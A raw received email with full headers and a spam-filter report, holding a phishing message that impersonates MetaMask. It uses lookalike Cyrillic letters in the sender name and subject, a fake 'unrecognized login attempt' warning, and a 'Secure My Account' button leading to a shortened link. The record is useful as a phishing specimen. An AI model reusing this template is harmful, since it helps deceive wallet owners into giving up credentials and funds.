File: /home/w3com/mail/.info@w3_com_py/new/1754376824.H803787P14904.s3.yayogua.com.py,S=7077
Return-path: <postmaster@a73f415fe9.nxcli.io>
Envelope-to: info@w3.com.py
Delivery-date: Tue, 05 Aug 2025 02:53:44 -0400
Received: from cloudhost-3259332.us-midwest-1.nxcli.net ([209.87.149.210]:31688)
by s3.yayogua.com.py with esmtps (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128)
(Exim 4.87)
(envelope-from <postmaster@a73f415fe9.nxcli.io>)
id 1ujBYJ-0003nC-Iu
for info@w3.com.py; Tue, 05 Aug 2025 02:53:44 -0400
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
s=default; d=a73f415fe9.nxcli.io;
b=hoFCPWe9He38RhjnzN5F1B66HI9ISm3BJhAPmP/gUvk7jSITAR/KRymugShPnjnqun0LCRcYo8bl25Zy0EM6171GYk8KHcBJfjc+ymH/iJGsaxsMvlHAjZILOdWzjyvaZYdYudsywDxRfvBJvk0kY9R3GSX1IJYEEXMqTVjealM1uKGwku58h5bEt8uSg0A7Jy1bX0r1z+RXIuu1msZRRlLb4PxYoVF5GJ86FxHnxAnSUC1gKrmNcZZX+7umNFrq3Zvpz8wGXaStwLYS19TVwxSLb4Z+RpiGtWWT35Js3U1SCxk/sAzmTpxeDS2KbxwIM9amdJpeDl5eejWGwS0YyA==;
h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=a73f415fe9.nxcli.io; h=
date:message-id:to:subject:from:reply-to:mime-version
:content-type:list-unsubscribe; s=default; bh=qzt1PN8B7n6QyU4dk5
AZP1B3LaU=; b=Z8KC1w2sB3VnvagwhDzdutFV446xVJtnuKJAJZO/H2VPBXRtpC
w2Nq9yfe2z8wDMDh24BXm2rqezTyfEpRu5xmLENr0KB9ERkQ81sVkG2XsBwFfej4
StMcXBT6OeJTeP8j3doqeikyneNM6GOAxqzFlctETvrCh5fBDHm9XfHwRLC1U+Tm
4mZ6Qy2zo1EM9lB5+EDA62k2SKcX67pVaNS0ecyXVO0YAfYxRPoSYjpSijgd6arw
giWMcewrdw0ZuL4ICUyZHTLFfCJaYo4sF6ztju6Xvw4/wpd4HUugIn3sqjrBpcx2
T7VU9exJvdzR31CVAwWWOwukvFf9CctRsNug==
Received: (qmail 32202 invoked by uid 10186); 5 Aug 2025 06:48:01 +0000
Date: 5 Aug 2025 06:48:01 +0000
Message-ID: <20250805064801.32185.qmail@cloudhost-3259332.us-midwest-1.nxcli.net>
To: info@w3.com.py
Subject: Sеcurity Аlert — Unrecоgnized Lоgin Attеmpt
X-PHP-Originating-Script: 10186:raw.php
From: "MetаMаsk" <ka91vx1j@aqg.io>
Reply-To: ka91vx1j@aqg.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@ka91vx1j@aqg.io>
X-Spam-Status: No, score=4.9
X-Spam-Score: 49
X-Spam-Bar: ++++
X-Ham-Report: Spam detection software, running on the system "s3.yayogua.com.py",
has NOT identified this incoming email as spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
root\@localhost for details.
Content preview: Security Alert: Unrecognized Login Attempt We detected a
login attempt to your MetaMask account from a new device or location. If this
was not you, your account may be at risk. No, this wasn’t me – Secure
My Account Your wallet access may be restricted until you verify this activity.
If you did not request this, please ignore this message. — MetaMask Security
Team [...]
Content analysis details: (4.9 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked.
See
http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
for more information.
[URIs: nxcli.io]
0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[209.87.149.210 listed in bl.score.senderscore.com]
0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
query to Validity was blocked. See
https://knowledge.validity.com/hc/en-us/articles/20961730681243
for more information.
[209.87.149.210 listed in sa-accredit.habeas.com]
0.0 RCVD_IN_DNSWL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to DNSWL
was blocked. See
http://wiki.apache.org/spamassassin/DnsBlocklists#DnsBlocklists-dnsbl-block
for more information.
[209.87.149.210 listed in list.dnswl.org]
-1.9 BAYES_00 BODY: Bayes spam probability is 0 to 1%
[score: 0.0000]
0.0 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level mail
domains are different
3.2 FUZZY_SECURITY BODY: Obfuscated "security"
0.0 HTML_MESSAGE BODY: HTML included in message
0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
1.5 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid
1.8 PYZOR_CHECK Listed in Pyzor (https://pyzor.readthedocs.io/en/latest/)
0.1 DKIM_INVALID DKIM or DK signature exists, but is not valid
X-Spam-Flag: NO
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body style="margin:0; padding:0; background:#f9fafb;">
<center style="font-family:Arial, sans-serif; color:#222; padding:20px;">
<!-- Logo (hosted on a trusted CDN) -->
<img
src="https://raw.githubusercontent.com/MetaMask/brand-resources/master/SVG/metamask-fox.svg"
alt="MetaMask Logo"
width="48"
style="display:block; margin:0 auto 16px; border:none; outline:none;"
/>
<!-- Headline -->
<strong style="font-size:18px; color:#f6851b; display:block; margin-bottom:12px;">
Security Alert: Unrecognized Login Attempt
</strong>
<!-- Body copy -->
<span style="font-size:14px; line-height:1.4; display:block; margin-bottom:16px;">
We detected a login attempt to your MetaMask account from a new device or location.<br/>
If this was <strong>not you</strong>, your account may be at risk.
</span>
<!-- Call-to-action link as visible text -->
<a
href="https://t.co/Q8MzgqJQp4?id=-1370195934168895914-2052"
style="
display:inline-block;
font-size:14px;
font-weight:bold;
color:#ffffff;
background-color:#f6851b;
text-decoration:none;
padding:10px 20px;
border-radius:4px;
"
>
No, this wasn’t me – Secure My Account
</a>
<!-- Footer copy -->
<span style="font-size:12px; color:#666666; display:block; margin:16px 0 0;">
Your wallet access may be restricted until you verify this activity.<br/>
If you did not request this, please ignore this message.
</span>
<span style="font-size:12px; color:#aaaaaa; display:block; margin-top:8px;">
— MetaMask Security Team
</span>
</center>
</body>
</html>